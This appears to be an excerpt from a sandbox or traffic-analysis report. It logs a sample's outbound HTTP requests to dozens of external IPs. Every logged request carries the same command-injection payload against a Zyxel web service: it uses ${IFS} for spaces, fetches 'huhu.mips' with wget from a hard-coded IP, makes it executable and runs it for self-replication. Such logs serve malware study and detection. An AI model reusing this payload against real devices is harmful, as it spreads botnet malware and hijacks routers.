                                                      Feb 2, 2024 06:36:12.055016041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9192192.168.2.144728875.90.254.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055039883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9193192.168.2.1432990192.50.108.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055088043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9194192.168.2.1456816196.93.250.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055114031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9195192.168.2.144095824.61.195.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055155993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9196192.168.2.1438172123.13.173.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055203915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9197192.168.2.143423491.17.182.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055233002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9198192.168.2.1454800183.205.211.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055278063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9199192.168.2.1440922116.49.57.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055308104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9200192.168.2.1451006154.206.255.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055350065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9201192.168.2.1433382119.9.206.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055396080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9202192.168.2.144137425.155.115.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055448055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9203192.168.2.144548052.96.213.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055495977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9204192.168.2.1446878209.5.11.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055530071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9205192.168.2.1452866105.148.137.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055577993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9206192.168.2.1449982200.105.180.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:12.055600882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9207192.168.2.1446414116.96.152.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067307949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9208192.168.2.1454686163.84.210.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067349911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9209192.168.2.1459140116.60.174.75443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067406893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9210192.168.2.1446278104.87.176.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067425013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9211192.168.2.1438444165.165.109.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067483902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9212192.168.2.14386584.105.70.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067512035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9213192.168.2.1438688101.71.164.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067564964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9214192.168.2.1450010115.132.237.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067610025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9215192.168.2.143890486.107.83.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067641020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9216192.168.2.143848263.29.189.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067682028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9217192.168.2.1437884156.233.217.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067728043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9218192.168.2.1433384189.185.226.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067771912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9219192.168.2.1448950161.1.106.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067806959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9220192.168.2.145321627.75.38.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067845106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9221192.168.2.1438658129.11.64.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067892075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9222192.168.2.145831419.75.100.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067951918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9223192.168.2.1443210118.100.217.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.067991018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9224192.168.2.145851088.221.174.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068017960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9225192.168.2.143717031.112.63.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068044901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9226192.168.2.143297817.184.82.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068084002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9227192.168.2.1452120146.21.210.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068126917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9228192.168.2.1433842171.244.110.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068173885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9229192.168.2.143644864.88.242.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068217993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9230192.168.2.1452704148.27.29.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068265915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9231192.168.2.1455444143.204.139.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068293095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9232192.168.2.1436290203.47.132.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068353891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9233192.168.2.1446236173.39.102.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068397045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9234192.168.2.146009260.163.190.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068447113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9235192.168.2.143394257.234.43.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068480968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9236192.168.2.1450758180.221.68.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068512917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9237192.168.2.145822245.16.71.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068551064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9238192.168.2.146007431.79.12.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068578959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9239192.168.2.1432854187.32.97.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068638086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9240192.168.2.1442364104.49.228.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068660975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9241192.168.2.144103485.80.185.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068716049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9242192.168.2.1449156198.3.143.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068744898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9243192.168.2.1440828191.105.240.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068797112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9244192.168.2.144117265.138.211.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068841934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9245192.168.2.143295078.79.231.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068876982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9246192.168.2.1445142166.61.25.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068901062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9247192.168.2.144283264.245.55.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068933010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9248192.168.2.144293645.219.146.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.068958044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9249192.168.2.1459166173.171.58.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069035053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9250192.168.2.1434920178.170.151.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069063902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9251192.168.2.1460706163.223.94.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069116116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9252192.168.2.1436472112.21.53.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069165945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9253192.168.2.1441776114.19.96.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:13.069186926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9254192.168.2.1434264117.51.252.47443
                                                      TimestampBytes transferredDirectionData
